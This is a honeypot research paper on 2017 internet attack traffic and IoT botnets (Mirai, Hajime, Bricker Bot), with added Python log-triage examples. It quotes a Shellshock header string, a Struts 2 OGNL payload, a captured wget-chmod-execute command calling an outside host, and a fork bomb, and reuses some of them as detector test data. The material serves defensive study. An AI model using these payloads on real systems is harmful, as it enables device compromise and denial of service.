Analysis of 24 Hours Internet Attacks: A Brief Overview of Malicious Traffic Targeting Featureless Servers on the Web

Tim Britton (1), Ian Liu-Johnston (1), Ian Cugnière (1), Swati Gupta (1), Danton Rodriguez (1), Julien Barbier (1), Sebastien Tricaud (2)
(1) Holberton School
(2) Honeynet Project

Abstract

For the past decades, bots and botnets have been on the front page of newspapers and are one of the main topics of discussion in the news media. The range of the attacks and their targets have been increasing.1 A recent example, the Mirai network - a botnet built through insecure Internet of Things (IoT) devices -, has been at the center of attention after it provoked an internet outage primarily on the East Coast.2 A study also found that “80 percent of spam was sent by botnets by 2009”.3 Despite this, most of our everyday life relies heavily on the internet and is still vulnerable to malicious attacks. This paper aims to explore where such attacks originate and how the attacks occur. We set up and decided to observe what happens to an internet-facing server that should not encounter anything but local network activity. To investigate further, we set up honeypots on that server to see how the flow of traffic changed, and what bots and other clients would do. We wish to share our findings and thus humbly contribute to more awareness about the risks faced by anyone using the internet.

1. Introduction & Methodology

In order to observe malicious activity on the internet we set clear steps to decide which methodology to adopt based on the traffic we would receive.

We first set up a bare Amazon AWS instance whose data center resides in Ashburn, Virginia. To get a general overview of the traffic that would come to the server, we did not run any services that would be useful to anybody else, and did not connect the Internet Protocol (IP) address to any domain name. Very shortly after renting the server, we set up a packet capture for a 24-hour period with tshark/wireshark. We did this to identify the most promising traffic/protocols to observe and concentrate our efforts on. We then analyzed the packet capture file with tools such as tshark/wireshark, Computer Incident Response Center’s (CIRCL) Border Gateway Protocol (BGP) ranking API, and p0f.

1.1 BGP Rankings

CIRCL’s BGP Ranking provides data to calculate the security ranking of Internet Service Providers (ISPs).4 We compared the list of IP addresses that accessed our server during the initial 24-hour period to calculate the risk assessment for these IP addresses.5 The closer the BGP ranking is to zero, the more malicious the IP address is. At the time, the most malicious IP in our logs scored 0 out of 13,043. This IP address accessed TCP port 3380, which is used by the SNS Channels. Other notable ports and protocols that were accessed by high risk IP addresses were various ephemeral ports such as the Intel

Remote Desktop Management Interface (IRDMI) protocol, the port 8089, and the port 81 (TorPark Onion routing). See Table 1.0 for the list of the most malicious IP addresses we captured (as of February 13th, 2017).

We realized that some protocols were attracting remarkably more traffic than others. For example, for application layer protocols, we recorded 255,796 connection attempts through Secure Shell (SSH), while we received only 1 connection to the Connection-less Lightweight Directory Access Protocol (CLDAP), cf. Table 1.1 in Annex.

1.2 Protocol Selection

While the scope of this paper might seem enormous, if not quixotic, after parsing the data, we decided to focus our efforts on the following protocols: the Hypertext Transfer Protocol (HTTP), the Session Initiation Protocol (SIP), SSH, and the Telecommunications Network (Telnet) protocol. These protocols were selected for the following reasons:
● The HTTP protocol is the most widely used protocol on the internet, and thus provides the biggest resource for exploits;
● The SIP protocol is often used for enterprise-level telecommunication systems;
● The SSH protocol represents many bruteforce attempts and accounts for more than half of the total traffic from our initial packet capture;
● The Telnet protocol: The Mirai botnet and its successor exploit this protocol, as IoT devices - which often use Telnet - comprise the majority of targeted systems.

We thus used honeypots to attract the traffic that targets the protocols above and analyzed the data they produced.6 Honeypots are pieces of software designed to reproduce the same functionality as vulnerable servers, and can act as decoys to attract intruders.

In this paper, we will first detail the traffic observed per protocol. Then, we will expand on the botnets’ patterns that we were able to notice. It will allow us to better grasp how these botnets infect and interact with a targeted system.

2. Protocols of interest

2.1 HTTP

“The Hypertext Transfer Protocol (HTTP) is an application-level protocol for distributed, collaborative, hypermedia information systems. It is a generic, stateless, protocol which can be used for many tasks beyond its use for hypertext, such as name servers and distributed object management systems, through extension of its request methods, error codes and headers.”7

Because HTTP is one of the most widely used protocols on the internet, it is also one of the main vectors for exploitation. We recorded 245 HTTP packets during our initial 24-hour packet capture.

To investigate this protocol further, we set up a web-application honeypot, Glastopf, running in a Docker container. This

honeypot provided basic functionality to record GET or PUT requests, IP addresses, Uniform Resource Identifiers (URIs), and timestamps. It was also designed to simulate SQL vulnerabilities and record injection attempts. We launched this honeypot alongside another packet capture for a second 24-hour period on March 7th, 2017.

The resulting logs from Glastopf did not yield much data, possibly because of specialized functionality, and possibly because Glastopf is an older honeypot. In total only 14 connections were made, two of which were requests for meta-release-lts and /phpmyadmin/scripts/setup.php, while the rest were for the website root.

To give us a broader picture of possible connections, we decided to run Glastopf for a much longer period of time. In addition, we wrote a basic honeypot in NodeJS to run simultaneously and compare the traffic from both servers.8 The custom honeypot served a static authentication page and had logging capabilities. We ran both web servers on port 80 for a 12-day period. By doing so, we were able to cross-reference the data obtained from those sources, which gave us a more refined understanding of the kind of attacks currently targeting the HTTP protocol (cf. Table 2.0 and Table 2.1).
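The honeypots described here recorded source addresses, URIs and request headers, and the HTTP section goes on to report the attack patterns found in them: Shellshock-style function definitions in the User-Agent header, Struts 2 OGNL expressions in the Content-Type header, and requests for well-known probe paths. The following is an added example, not code from the paper or from the Glastopf or NodeJS honeypots, that triages such request records for exactly those patterns. The records, addresses and the `classify_request`/`triage` helpers are all constructed for illustration.

```python
"""Triage HTTP honeypot request records for Shellshock-style header values,
Struts 2 OGNL Content-Type payloads and requests for commonly probed paths.
All records below are constructed; addresses are documentation ranges."""
import re
from collections import defaultdict

# Shellshock (CVE-2014-6271, reference 9 in the paper): an empty function
# definition "() { ...};" in a header value, with shell commands after it.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{[^}]*\}\s*;")

# Paths the paper lists as commonly requested on its HTTP honeypots.
PROBE_PATHS = {
    "/phpmyadmin/scripts/setup.php",
    "/system.ini",
    "/struts2-showcase/",
    "/current-config/passwd",
}


def classify_request(path, headers):
    """Return the list of finding names for one request (empty if nothing matched)."""
    findings = []
    for name, value in headers.items():
        if SHELLSHOCK_RE.search(value):
            findings.append("shellshock-function-definition")
        # Struts 2 (CVE-2017-5638, reference 10): an OGNL "%{...}" expression in
        # Content-Type; a legitimate media type never contains "%{".
        if name.lower() == "content-type" and "%{" in value:
            findings.append("struts-ognl-expression")
    if path in PROBE_PATHS:
        findings.append("known-probe-path")
    return findings


def triage(records):
    """Map each finding to the sorted list of distinct source IPs that produced it."""
    hits = defaultdict(set)
    for rec in records:
        for finding in classify_request(rec["path"], rec["headers"]):
            hits[finding].add(rec["src"])
    return {finding: sorted(ips) for finding, ips in hits.items()}


# Constructed records in the shape the honeypots logged: source, method,
# URI and request headers. The two payload strings copy the formats quoted
# in the paper; everything else is made up for the example.
SAMPLE_REQUESTS = [
    {"src": "203.0.113.5", "method": "GET", "path": "/",
     "headers": {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64)"}},
    {"src": "198.51.100.7", "method": "GET", "path": "/",
     "headers": {"User-Agent": "( ) { :;}; /bin/bash -c 'echo vulnerable'"}},
    {"src": "192.0.2.44", "method": "POST", "path": "/",
     "headers": {"Content-Type": "%{#context['com.opensymphony.xwork2.dispatcher"
                                 ".HttpServletResponse'].addHeader('tkplpyg',"
                                 "'tkplpyg')}.multipart/form-data"}},
    {"src": "203.0.113.5", "method": "POST", "path": "/upload",
     "headers": {"Content-Type": "multipart/form-data; boundary=----constructed"}},
    {"src": "198.51.100.9", "method": "GET", "path": "/phpmyadmin/scripts/setup.php",
     "headers": {"User-Agent": "python-requests/2.13"}},
]

if __name__ == "__main__":
    for finding, ips in sorted(triage(SAMPLE_REQUESTS).items()):
        print(f"{finding}: {', '.join(ips)}")
```

The Shellshock check is applied to every header because the function-definition string can be placed in any header a CGI script exports as an environment variable, whereas the OGNL check is restricted to Content-Type, the field the Struts 2 bug parsed; a benign multipart upload (the fourth record) therefore produces no finding.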

In our observations of the Glastopf logs, the majority of client requests were for PHPMyadmin and vulnerable Wordpress plugins. There were various other requests to interesting URIs such as /system.ini, /struts2-showcase/, and /current-config/passwd. Regardless of where the requests originated from, be it Bangalore, Austria or the United States, the attacks were fairly homogeneous between our honeypots and relied on well-known attack vectors.

The most interesting log entries for the NodeJS honeypot provided links to trojans and other binaries. They were sent to our servers in various HTTP headers, with the ability to install and execute malware through known exploits.

One type of malicious request attempted to leverage an exploit known as “Shell Shock” or “Bashdoor”,9 which was made public in 2014. It exploited a vulnerability in web servers that use Bash to process the User-Agent header for certain requests. The User-Agent string would be sent as a malformed function definition with bash commands immediately following the function definition. Such a string could adopt the following format:

( ) { :;}; /bin/bash -c ‘echo vulnerable’

The Shellshock exploit in our logs attempted to download a shell script, a Perl script, and a tar archive renamed to have a .jpg extension. The tar archive compressed all other files. The shell script created a crontab that would re-download the trojan and verify that the service was running. All Bash scripts ensured persistence for the Perl script named “DDoS Perl IrcBot v1.0 / 2012 by DDoS Security Team”. We also encountered a modified version of the Perlbot that also leveraged the Shellshock vulnerability in other logs.

Another series of notable exploit attempts leveraged a recent vulnerability in the Apache Struts web framework.10 This exploit was revealed March 7th, 2017. The initial log entries were dated shortly after the exploit was publicly released. There were multiple exploit attempts that used the same methodology as in the exploit-db python script.11 The exploit works by leveraging a vulnerability in parsing the Content Type header field, which allows remote code execution.12 Subsequent attempts were enumeration techniques from Metasploit modules,13 that followed this convention:

%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('tkplpyg','tkplpyg')}.multipart/form-data

The first few malicious clients downloaded a malicious script for Linux and a binary named “UnInstall.exe” for Windows. This binary was also found during the same time period in a pirated torrent of Skyrim.

The Linux script stopped all firewalls, set the DNS server to 8.8.8.8, removed any instances of Apache from /etc/init.d/ and instances of the malicious binary. Then it downloaded a series of dynamic libraries as well as the malicious binary masquerading as an Apache process. The binary itself was a bitcoin miner based off of cpuminer2.3.3, that mined into the Stratum mining pool.14 It used the hash algorithm cryptonight, with the username “sqwukiomcage.” This illustrates the recent trend of increasing attacks aimed at cryptocurrencies. Next, it set a crontab to download and execute the script again, and checked through “known_hosts” in all “.ssh” directories, and in all “.bash_history” files to find any servers that were connected through ssh. Finally it downloaded the trojan onto those new servers.

2.2 Telnet - esp. IoT Honeypot

“The purpose of the TELNET Protocol is to provide a fairly general, bi-directional, eight-bit byte oriented communications facility. Its primary goal is to allow a standard method of interfacing terminal devices and terminal-oriented processes to each other. It is envisioned that the protocol may also be used for terminal-terminal communication ("linking") and process-process communication (distributed computation).”15

Telnet is an unsafe protocol as all information (including authentication) is exchanged over plain text. Nonetheless, it is still used for IP cameras, routers and other IoT devices to allow remote system administration, such as firmware upgrades. It is used instead of SSH on these devices because it is easy to implement and lightweight, making it acceptable for devices without a lot of resources.

Telnet was the second port to attract the most traffic, with 606 interactions detected during the 24-hour capture. We decided to study Telnet because of the aforementioned trend regarding botnets, such as Mirai, targeting IoT devices. Our intention was to study how those trends - noted by many experts - translate in near real-time observation. We thus decided to investigate further. In order to do so, we installed the H-M-S Telnet honeypot16 in order to become the target of a larger flow of attacks/interactions. This honeypot has no specific content but does mimic a GoAhead wifi camera based on an exploit uncovered by Pierre Kim.17

Focusing on IoT devices paid off as the traffic captured demonstrates. On March 31st, we saw 1,075 connections, with a total of 306 unique IP addresses, connect to the Telnet honeypot server. 835 of those 1,075 connections resulted in the connecting party successfully logging in (providing any two lines of input for a username and password), with 267 unique IPs logging in. Of the 835 logins, 750 were generated by bots that successfully connected and created enough traffic to fit into an identifiable pattern. We observed patterns left by the following variants of Mirai: Mirai scanner, Mirai/Ecchi downloader, OBJPRN Mirai variant, Hajime downloader, and the Mirai 'xkajdnabw' variant. Around November 2016, the Mirai source code was released to the general public. Mirai’s original source code continues to be modified and new variants spread and keep infecting vulnerable devices. The variants mentioned previously echo concerns about Mirai being an easily replicable and highly adaptable botnet.18

The countries of origin from our analysis directly correlated to some of those that were observed by experts in the field of cybersecurity: Taiwan, Russia, South Korea, Turkey, China, the United States, Brazil, and Iran (see Map 2.0).19
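The Telnet logins above were counted as bot-generated when their input "fit into an identifiable pattern". The following added example, which is not the paper's code nor part of the H-M-S honeypot, shows one way to do that over the honeypot's log lines: it tags each session with the behaviours the paper attributes to Hajime and Mirai in sections 3.1 and 3.2 (the /bin/busybox applet check, the /proc/mounts enumeration, reading /bin/echo for its ELF header, the wget/tftp download followed by chmod and execution) and to Bricker Bot in section 3.4 (OS reconnaissance followed by a fork bomb). The log line format copies the excerpt quoted in the Hajime section; the lines, addresses, tag names and label thresholds below are constructed for the example.

```python
"""Classify Telnet honeypot sessions by the command patterns the paper
attributes to Mirai, Hajime and Bricker Bot. Log lines follow the
'RECEIVED INPUT' format of the honeypot excerpt in the paper; the
sessions and addresses below are constructed."""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) - RECEIVED INPUT (?P<src>\S+) : \['(?P<cmd>.*)'\]$"
)

# One regex per behaviour described in sections 3.1, 3.2 and 3.4.
PATTERNS = {
    "busybox-probe": re.compile(r"/bin/busybox\s+\S+"),          # applet check (ECCHI/MIRAI)
    "mount-enum": re.compile(r"/proc/mounts"),                     # search for writable mounts
    "elf-header-probe": re.compile(r"\b(?:cat|dd)\b[^;]*/bin/echo"),  # architecture sniffing
    "fetch-and-execute": re.compile(r"\b(?:wget|tftp)\b.*;\s*chmod\s+\S+.*;\s*\./"),
    "competitor-kill": re.compile(r"\bkill\s+-9\b"),               # Mirai killing rival bots
    "os-recon": re.compile(r"/proc/version|\buname\s+-a\b"),       # Bricker Bot reconnaissance
    "fork-bomb": re.compile(r"\w+\s*\(\)\s*\{\s*\w+\s*\|\s*\w+\s*&\s*\}"),
}


def parse_inputs(lines):
    """Yield (source_ip, command) for every RECEIVED INPUT line; other lines are skipped."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield m.group("src"), m.group("cmd")


def tag_command(cmd):
    """Set of behaviour tags matched by one command line."""
    return {tag for tag, rx in PATTERNS.items() if rx.search(cmd)}


def label(tags):
    """Name the bot family a session's accumulated tags resemble (constructed rules)."""
    if {"busybox-probe", "fetch-and-execute"} <= tags:
        return "mirai-style loader"
    if "fork-bomb" in tags:
        return "brickerbot-style"
    if tags:
        return "partial pattern"
    return "no known pattern"


def profile_sessions(lines):
    """Return {source_ip: {"tags": [...], "label": ...}} for every source in the log."""
    per_src = defaultdict(set)
    for src, cmd in parse_inputs(lines):
        per_src[src] |= tag_command(cmd)
    return {src: {"tags": sorted(tags), "label": label(tags)} for src, tags in per_src.items()}


def count_patterned(profiles):
    """Number of sources whose input fit an identifiable pattern, as the paper counts them."""
    return sum(1 for p in profiles.values() if p["label"] != "no known pattern")


# Constructed log: one Mirai-like session, one Bricker Bot-like session,
# and one human-looking session that matches nothing.
SAMPLE_LOG = """\
2017-03-31 05:20:01,100 - RECEIVED INPUT 198.51.100.21 : ['enable']
2017-03-31 05:20:01,300 - RECEIVED INPUT 198.51.100.21 : ['shell']
2017-03-31 05:20:01,500 - RECEIVED INPUT 198.51.100.21 : ['sh']
2017-03-31 05:20:01,700 - RECEIVED INPUT 198.51.100.21 : ['/bin/busybox ECCHI']
2017-03-31 05:20:02,000 - RECEIVED INPUT 198.51.100.21 : ['cat /proc/mounts; /bin/busybox ECCHI']
2017-03-31 05:20:02,400 - RECEIVED INPUT 198.51.100.21 : ['cat /bin/echo']
2017-03-31 05:20:03,000 - RECEIVED INPUT 198.51.100.21 : ['rm .s; wget http://192.0.2.10:8080/.i; chmod +x .i; ./.i; exit']
2017-03-31 05:20:03,200 - Lost connection to 198.51.100.21:40111
2017-03-31 05:22:10,000 - RECEIVED INPUT 203.0.113.8 : ['cat /proc/version']
2017-03-31 05:22:10,300 - RECEIVED INPUT 203.0.113.8 : ['uname -a']
2017-03-31 05:22:11,000 - RECEIVED INPUT 203.0.113.8 : ['d(){ d|d & };d 2>/dev/null']
2017-03-31 05:25:00,000 - RECEIVED INPUT 192.0.2.55 : ['ls']
2017-03-31 05:25:02,000 - RECEIVED INPUT 192.0.2.55 : ['q']
""".splitlines()

if __name__ == "__main__":
    profiles = profile_sessions(SAMPLE_LOG)
    for src, p in sorted(profiles.items()):
        print(f"{src}: {p['label']} {p['tags']}")
    print(f"{count_patterned(profiles)} of {len(profiles)} sources fit a known pattern")
```

Tags are accumulated per source rather than per line because, as the Mirai walkthrough shows, the probe, the mount check, the ELF sniff and the download arrive as separate commands; a single line rarely identifies the family on its own.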

2.3 SIP

SIP is based on an HTTP-like request/response transaction model and is used to establish, modify, and terminate multimedia sessions such as audio or video calls, Internet telephony calls.20

The SIP protocol caught our attention for several reasons. Not only did it account for a significant portion of the traffic we received, but most of its applications are in enterprise telecommunication systems.

However, SIP ended up being a disappointing lead as the only packets we observed were generated by SIPVicious. As noted by Cisco:

“The tool could also be used to scan the IP or VoIP telephony network. Due to a flaw in the processing of SIP messages by the telephony device firmware, an attacker could use any number or any SIP address in the INVITE message to scan random networks to determine availability of live hosts. The attacker could initiate an INVITE session and determine a successful detection by receiving a phone ring as a response. This detection could allow the attacker to conduct further attacks such as host spoofing to make phone calls using the detected IP phone identity.”21

It can also be used in a non-malicious way to audit a network.22

All the packets were transferred over UDP, using the second version of the SIP protocol. The headers of the SIP packets show connection attempts. The To and From header fields indicate that after the initial INVITE request, attackers tried random strings in the Contact header field to directly connect with a user at another end. Let us note that the results of this traffic may be attributed to a recent release of SIPVicious. The latest release of SIPVicious occurred on February 4th. We ran our initial packet capture concurrently on February 4th - 5th.

2.4 SSH

“The Secure Shell (SSH) is a protocol for secure remote login and other secure network services over an insecure network.”23

Although statistically we got an enormous volume of SSH connection attempts, we decided not to investigate the protocol as thoroughly as HTTP or Telnet because the traffic is mostly comprised of brute force attempts.

While the number of connection attempts was significant, the vast majority of the attempts came from three IP addresses whose geolocation data corresponded to the Guangdong and Jiangsu areas in China. To be precise, 130,598 of the 140,606 SSH connection attempts we analyzed came from just three IP addresses. In fact, over 99.8% or 140,417 of the SSH connection attempts appeared to have originated from China. The highest number of connection attempts from an IP address whose geolocation data was outside of China was 49.

A general trend we noticed by analyzing the auth logs from the 24-hour capture on the AWS server was IP addresses trying to connect via SSH as root on all ports from 1-65535, which may explain the high volume of traffic from individual IP addresses. When we analyzed the auth logs from the DigitalOcean server, we noticed that there were a number of bruteforce attempts against a range of user names, but not against a range of ports, contrary to the AWS instance.

3. Botnets detected

After having briefly mentioned the botnets encountered, we will expand on that subject as it is one of the most notable and worrying trends in today’s security landscape.
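The SSH observations above come from aggregating sshd auth logs by source address: a handful of sources dominating the total, one source trying root across a range of ports, another trying a range of usernames. The following added example, not the paper's own tooling, performs that aggregation over constructed auth log lines in the standard sshd syslog format and names the two brute-force shapes the paper contrasts between its AWS and DigitalOcean instances. The `profile` thresholds, the `summarize` function and the addresses are assumptions made for the example.

```python
"""Aggregate sshd 'Failed password' lines per source address and name the
brute-force shape of each source. Log lines are constructed in the standard
sshd syslog format; addresses are documentation ranges."""
import re
from collections import Counter, defaultdict

FAILED_RE = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+)"
)


def parse_failures(lines):
    """Yield (user, ip, port) for each failed-password line; everything else is ignored."""
    for line in lines:
        m = FAILED_RE.search(line)
        if m:
            yield m.group("user"), m.group("ip"), int(m.group("port"))


def profile(users, ports):
    """Name a source's brute-force shape from its distinct usernames and client ports
    (constructed thresholds)."""
    if len(users) >= 3:
        return "username-spray"
    if len(users) == 1 and len(ports) >= 3:
        return "port-spray"
    return "single-target"


def summarize(lines, top_n=3):
    """Per-source failure counts, the share of all failures caused by the top_n
    sources, and a profile per source."""
    counts = Counter()
    users = defaultdict(set)
    ports = defaultdict(set)
    for user, ip, port in parse_failures(lines):
        counts[ip] += 1
        users[ip].add(user)
        ports[ip].add(port)
    total = sum(counts.values())
    top = sum(c for _, c in counts.most_common(top_n))
    return {
        "total_failed": total,
        "by_ip": dict(counts),
        "top_share": round(top / total, 3) if total else 0.0,
        "profiles": {ip: profile(users[ip], ports[ip]) for ip in counts},
    }


# Constructed auth log: one source sweeping root over several ports, one
# sweeping usernames from a fixed port, one repeating a single target, plus
# an accepted login and a PAM line that must be ignored.
SAMPLE_AUTH_LOG = """\
Mar  7 10:21:43 aws-node sshd[2201]: Failed password for root from 203.0.113.10 port 1 ssh2
Mar  7 10:21:44 aws-node sshd[2203]: Failed password for root from 203.0.113.10 port 2 ssh2
Mar  7 10:21:45 aws-node sshd[2205]: Failed password for root from 203.0.113.10 port 3 ssh2
Mar  7 10:21:46 aws-node sshd[2207]: Failed password for root from 203.0.113.10 port 4 ssh2
Mar  7 10:30:01 aws-node sshd[2301]: Failed password for invalid user admin from 198.51.100.3 port 55100 ssh2
Mar  7 10:30:02 aws-node sshd[2303]: Failed password for invalid user test from 198.51.100.3 port 55100 ssh2
Mar  7 10:30:03 aws-node sshd[2305]: Failed password for invalid user oracle from 198.51.100.3 port 55100 ssh2
Mar  7 10:30:04 aws-node sshd[2307]: Failed password for invalid user pi from 198.51.100.3 port 55100 ssh2
Mar  7 11:02:10 aws-node sshd[2401]: Failed password for root from 192.0.2.77 port 40000 ssh2
Mar  7 11:02:12 aws-node sshd[2403]: Failed password for root from 192.0.2.77 port 40000 ssh2
Mar  7 11:05:00 aws-node sshd[2501]: Accepted publickey for deploy from 192.0.2.8 port 51022 ssh2
Mar  7 11:05:00 aws-node sshd[2501]: pam_unix(sshd:session): session opened for user deploy
""".splitlines()

if __name__ == "__main__":
    s = summarize(SAMPLE_AUTH_LOG)
    print(f"{s['total_failed']} failures, top-3 share {s['top_share']:.1%}")
    for ip, n in s["by_ip"].items():
        print(f"{ip}: {n} failures, {s['profiles'][ip]}")
```

On the paper's numbers the same `top_share` computation gives 130,598 / 140,606, about 92.9%, which is what makes per-source aggregation, rather than per-attempt counting, the useful first step when an SSH capture is dominated by a few addresses.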

3.1 Hajime

According to Rapidity Network, Hajime was first spotted around October 5th, 2016.24 The traffic generated is similar to Mirai’s; after sequentially using a list of randomly generated passwords, Hajime attempts to open a new shell, and uses the /bin/busybox trick seen with Mirai (with ECCHI normally) to verify whether it is inside an actual shell. Then, it checks /proc/mounts, and attempts to go to a seemingly random directory and to run a set of commands to ensure that it can actually write to the directories listed. Hajime also checks to see if it has access to netcat or wget, and finally, runs the Data Duplicator (DD) command against /bin/echo to grab the first 52 bytes and analyze the Executable and Linkable Format (ELF) header, to get architecture information for the current machine. Finally, Hajime will download a script for the appropriate architecture with wget (if accessible and if the control server has that resource).

2017-03-31 05:22:16,698 - RECEIVED INPUT 202.174.185.162 : ['rm .s; wget http://73.9.22.205:49511/.i; chmod +x .i; ./.i; exit']
2017-03-31 05:22:17,498 - RECEIVED INPUT 202.174.185.162 : ['q']
2017-03-31 05:22:17,504 - Lost connection to 202.174.185.162:39189

Other researchers have noted that it will attempt to echo-assemble a binary if wget and nc are unavailable. In this case, the downloaded malware has an MD5 sum of 91a02956678c4ff6aa9075cfe99db24d.

The purpose of Hajime is unknown and open to speculation. The Hajime binary actually attempts to block the ports that Mirai uses to communicate with its command and control (C&C) servers, displaying the following message on infected systems:

Just a white hat, securing some systems.
Important messages will be signed like this!
Hajime Author.
Contact CLOSED
Stay sharp!

Like the other botnets found, Hajime's effects are only stored in memory, and resetting the device will clear it back to the same insecure settings Hajime found the device with.

3.2 Mirai

Mirai is likely the most famous botnet, found to be responsible for a record-breaking 620 Gbps DDoS attack.25 On October 21st, 2016, Dyn’s DNS infrastructure was hit with an attack of a similar Gbps output, drawing Mirai into the public spotlight.26 On Twitter, Octave Klaba, the founder and owner of OVH, reported attacks thought to stem from Mirai, reaching over 1 Tbps.27 Many researchers have done their own study of Mirai, whose source code was released around October 1st, 2016, on Hackforums, by a user called Anna-Senpai.28 This latter source includes everything from the scanner, the loader, even an API where customers can be allowed access to the C&C server to direct attacks. As a result of the source being leaked, countless modified strains have been found in the wild and continue to be found.

Mirai first scans the environment it has penetrated. It logs on by randomly selecting username/logins from a predetermined list. Once it is in the system, it attempts to determine whether it is in a shell or not using shell and sh, checking access to the /bin/busybox MIRAI path to ensure it is receiving the proper response (MIRAI: applet not found).

If it receives the expected response, the Mirai downloader, ECCHI, shows up next. It starts out with similar commands to the scanner, running shell and sh, and then /bin/busybox ECCHI. Next, it checks the output of ps so as to discover other running processes. The Mirai source carries a list of processes to destroy, namely other botnets. If any are found, it will run kill -9 against them. This is a territorial act, as it wants to ensure it is the only botnet in control of the device.

Like Hajime, it checks /proc/mounts for mounted filesystems and cycles through them to determine access.

To prep for the impending download, Mirai copies /bin/echo, empties it, and then chmod’s it to ensure it can execute the file. The last step before it can download is to cat /bin/echo. The bot ignores everything but the ELF header, and simply checks it for the architecture information. Then, it checks for wget and tftp, and uses whichever is available. Mirai downloads the architecture specific file. Mirai supports x86, MIPS, MPSL, ARM, ARM5, ARM7, PPC, SPC, M68K, and SH4 architectures, and the source actually includes a cross compiler for this reason. Then it downloads it to the prepared dvrHelper file and runs it. That done, it runs the script and exits out, its mission accomplished.

The malicious binary causes a connection between the device and the Mirai C&C server. The device will begin the same scanning routine seen previously, alerting the C&C server of insecure bots so it can be hit by a loader and added to the botnet. The connection can also be used to broadcast a multitude of DDoS attacks to the clients: UDP flood, Valve query flooding, 'DNS water torture', Synchronization Acknowledgment (SYN/ACK) floods, Generic Routing Encapsulation (GRE) IP, Ethernet flooding, and HTTP flooding.

3.3 Bashlite

The Bashlite malware, like Qbot and its derivatives, has been around since at least early 2015 and the source is easy to find.29 HackForums and LeakedFiles list several, and even GitHub has several repos with the source. The HackForums user Anna-Senpai even references it in the original forum post where the Mirai source code was posted: “However, I know every skid and their mama, it's their wet dream to have something besides Qbot.” and then references the speed of Mirai versus Qbot: “Bots brute Telnet using an advanced SYN scanner that is around 80x faster than the one in Qbot, and uses almost 20x less resources.”

A quick Google search results in numerous YouTube videos and forum posts with tutorials on how to set up Qbot. Most versions of Qbot lack any kind of honeypot detection, and simply log in and try to dump their malware. Each client malware is cross-compiled for different architectures, as we can see at one of the GitHub links.30 NTPD is MIPS, bash is x86, tftp is ARMv6, etc. Basically, it attempts to download every possible file and run every possible one, hoping one will be the right architecture to infect the client.

Qbot/bashlite generally contains capabilities for HTTP, UDP and TCP flooding attacks, but with so many sources available the attack vectors can differ from bot to bot.

3.4 Bricker Bot

Bricker Bot made the headlines May 4th, 2017, after a RadWare article revealed details about the bot.31 It returned to the spotlight on April 21st, 2017, with a BleepingComputer article that claimed to have found the author of Bricker Bot.32

Bricker Bot is a grey-hat bot. It attempts to log in to insecure Telnet devices and disable them, either temporarily or permanently. Bricker Bot uses Tor exit nodes to conceal the actual IP of the attacking device.

Its self-proclaimed creator, under the nickname janit0r, claims to have bricked around 2 million devices. According to Radware, Bricker Bot would have permanently disabled some IoT devices, but its actual impact remains unknown.

On April 2nd, 2017, the honeypot server saw several different attack patterns matching either Bricker Bot or that of a similar botnet. Variations of the Bricker Bot attack pattern were seen 21 times, originating from 6 different IPs. The bot collected the OS information from /proc/version and uname -a, checked shadow/passwd, and checked the contents of /etc/. Then, after running su root to ensure that the user was root, it attempted to run a forkbomb by creating a function that repeatedly forked itself:

d(){ d|d & };d 2>/dev/null

Traffic received in the same timeframe and for several days caused the honeypot to hang on the passwd command, which the bot seemed to follow minutes later by trying to kill every running process and reboot.

Another type of traffic encountered, more malicious, redirected /dev/urandom to random device descriptors, attempting to clear the IP route and setting max threads to one.

After fixing the bug that caused the honeypot to hang on the 'passwd' command, we could see that the bot was attempting to change the password to a randomly generated string, which was different each time it connected.

The honeypot was modified for the passwd command to 'work'; running passwd would lock the honeypot out to anyone but those using the provided password, and in 48 hours of uptime, we did not witness any login attempt using the generated password.

On April 4th, 2017, the honeypot went down for approximately 6 hours and thereafter stopped receiving traffic. It is worth noting that we had set up two other honeypots - one of them in the same DigitalOcean region - that never received any traffic from that bot. The only difference being that the honeypot attracting Bricker Bot traffic was spun up in early March, whereas the other two honeypots were not started until the end of March.

The last time the honeypot monitored any Bricker Bot-like activity was April 24th, 2017, with some slight differences compared to the previous patterns observed. This time, it left a message in the ‘message of the day’ (motd) file warning that the system had been hacked, and then immediately returned to forkbomb it. The traffic resulted in 180 logins in one day, from two IPs.

Conclusion

More than twenty years ago, John Perry Barlow in his Declaration of the Independence of Cyberspace called for a civilization “more humane and fair” than that of governments. However, and as mentioned above, the number of malware attacks keeps increasing at an incredible pace. When we started our research for this paper, Mirai was the most malicious botnet in terms of scope. As of this writing WannaCry/WannaCrypt seems poised to take its place in the headlines.

The source of attempted exploits observed spans across the whole globe. Featureless servers encounter a considerable amount of traffic, but that volume is even greater when the server has a purpose, such as an IP camera, or a Wordpress website with a domain name.

Interestingly, we discovered that most of the attacks rely on old malware, which tends to indicate that those attacks are still successful and thus that steps to prevent them are largely ignored. Indeed, these exploits mostly rely on improperly configured or outdated software, and generic username/password combinations.

The attack patterns we recorded for HTTP, SSH, and SIP relied on generic exploit attempts that seemed to scan a range of IP addresses for well-known vulnerabilities. Telnet, on the other hand, relied on even simpler intrusion methods, by bruteforcing with default username and password combinations. Sometimes, these spray-and-pray attacks immediately attempted to download antiquated scripts, or more contemporary trojans, but none of the recorded attempts were covert enough to evade detection or overcome simple protective measures. On the other hand, we came across more recent attacks among which several variants of the Mirai botnet. Albeit more recent, those botnets also rely on weak or nonexistent security measures on the part of their targets.

While this paper reaches its conclusion, our work is not done and we will keep developing our honeypots so as to respond more dynamically to malicious connection attempts.

Acknowledgments

This work would not have been possible without Sebastien Tricaud, the founder of the French Honeynet chapter, to whom we are especially indebted. He provided us guidance and leadership every step of the way, allowing us to succeed as a team.

A co-founder of Holberton School, Julien Barbier’s help was invaluable. Not only did he introduce us to Sebastien, but he also gave us the opportunity, as students, to discover more about the field of information security.

We are grateful to Richard Sim and Philip Yoo, both students at Holberton School, for proofreading this paper and contributing to making it better.

Annex

References

1. Lillian Ablon, Martin C. Libicki, Andrea A. Golay. 2017. Markets for Cybercrime Tools and Stolen Data. RAND. pp. 21-23. [ONLINE] Available at: https://www.rand.org/content/dam/rand/pubs/research_reports/RR600/RR610/RAND_RR610.pdf. [Accessed 2 May 2017].
